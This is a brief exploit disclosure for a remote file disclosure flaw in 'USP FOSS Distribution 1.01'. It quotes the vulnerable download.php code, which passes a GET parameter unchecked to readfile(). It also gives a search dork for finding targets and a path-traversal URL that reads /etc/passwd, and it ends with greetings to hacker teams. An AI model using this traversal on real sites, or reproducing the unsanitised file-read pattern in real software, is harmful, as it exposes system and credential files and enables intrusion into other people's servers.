USP FOSS Distribution 1.01(download.php dnld)Remote File Disclosure
Discovered by: GolD_M = [Mahmood_ali]
Dork:intitle:USP FOSS Distribution
V.Code In /user/download.php:
###################/user/download.php###################
<?
$file = @$_GET['dnld'];<----[+]
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header('Content-Length: ' . filesize($file));
header('Content-Disposition: attachment; filename=' . basename($file));
readfile($file); <----[+]
?>
########################################################
Exploit:[Path_USP FOSS]/user/download.php?dnld=…/…/…/…/…/…/etc/passwd
Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & bd0rk